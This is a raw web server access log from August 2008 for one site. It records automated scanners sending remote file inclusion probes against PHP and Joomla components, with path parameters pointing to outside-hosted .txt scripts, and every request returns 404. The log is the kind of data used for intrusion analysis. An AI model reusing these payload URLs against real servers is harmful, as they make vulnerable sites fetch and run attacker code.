64.49.254.139 - - [10/Aug/2008:18:59:47 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:59:47 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:18:59:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:19:00:03 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:19:00:03 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:19:00:04 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.253.223.90 - - [10/Aug/2008:19:00:29 -0700] "GET /logs/access_080317.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:00:38 -0700] "GET /logs/access_080707.log/rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:00:38 -0700] "GET /rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:00:38 -0700] "GET /logs/rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:01:24 -0700] "GET /logs/access_080630.log/rgboard/include/bbs.lib.inc.php?site_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:19:01:40 -0700] "GET /logs/access_071014.log/modules/coppermine/include/init.inc.php?CPG_M_DIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:19:01:51 -0700] "GET /logs//components/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
69.72.153.58 - - [10/Aug/2008:19:01:52 -0700] "GET //components/errors.php?error=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/nfo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:19:01:58 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:02:07 -0700] "GET /logs/access_080505.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:02:14 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:02:14 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:02:15 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
210.245.226.25 - - [10/Aug/2008:19:02:22 -0700] "GET /logs/access_071028.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:02:33 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:02:33 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:02:33 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.230.197.245 - - [10/Aug/2008:19:02:37 -0700] "GET /logs/access_080114.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.ordconstruction.com/skins/default_blue/mail/common_templates/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
67.19.51.194 - - [10/Aug/2008:19:02:41 -0700] "GET /logs/access_080310.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.dreamcamp.mn/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:03 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:10 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:10 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:11 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:13 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:13 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:13 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:13 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:13 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:13 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:03:13 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:03:14 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.149.247.12 - - [10/Aug/2008:19:03:18 -0700] "GET /logs/access_080331.log//com_mtree/Savant2/Savant2_Plugin_stylesheet.php?wp-pass.php?_wp_http_referer=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:19 -0700] "GET /logs/access_080128.log/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:19 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:19 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:20 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:20 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:03:20 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:03:26 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:19:03:42 -0700] "GET /logs/access_070924.log/?path[docroot]=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:04:02 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:04:02 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:04:02 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:04:10 -0700] "GET /logs/access_070924.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:04:15 -0700] "GET /logs/access_080407.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:04:15 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:04:15 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:04:23 -0700] "GET /logs/access_080505.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:04:27 -0700] "GET /logs/access_080505.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:04:32 -0700] "GET /logs/access_080505.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:04:38 -0700] "GET /logs/access_080505.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:04:39 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:04:39 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:04:42 -0700] "GET /logs/access_080519.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.5.163.212 - - [10/Aug/2008:19:04:44 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:06 -0700] "GET /logs/access_071015.log//newspublish/include.php?path%5Bdocroot%5D=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:12 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:12 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:12 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:13 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:13 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:13 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:14 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:14 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:14 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:16 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:16 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:17 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:22 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:22 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:22 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:23 -0700] "GET /logs/access_080421.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:23 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:24 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:24 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:28 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:28 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:28 -0700] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:35 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:38 -0700] "GET /logs/access_080114.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:40 -0700] "GET /logs/access_071224.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:40 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:41 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:42 -0700] "GET /logs/access_070723.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:44 -0700] "GET /logs/access_071231.log//components/com_simpleboard/image_upload.php?sbp=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:05:47 -0700] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:05:51 -0700] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:06:01 -0700] "GET /logs/access_070827.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:19:06:15 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:19:06:15 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/kiranaandi/test.txt??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:19:06:33 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.galf.org"
70.85.102.100 - - [10/Aug/2008:19:06:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/dianavirsa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:07:11 -0700] "GET /logs/access_080114.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:07:11 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.49.254.139 - - [10/Aug/2008:19:07:11 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.39.5.203 - - [10/Aug/2008:19:07:39 -0700] "GET /logs/access_080519.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.loblab.com/mgm/vote/include/iddc9.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:07:40 -0700] "GET /logs/access_080114.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:07:40 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:07:40 -0700] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:19:07:46 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:19:07:49 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
219.117.239.114 - - [10/Aug/2008:19:07:52 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:07:54 -0700] "GET /logs/access_080114.log//modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.73.189.205 - - [10/Aug/2008:19:07:54 -0700] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
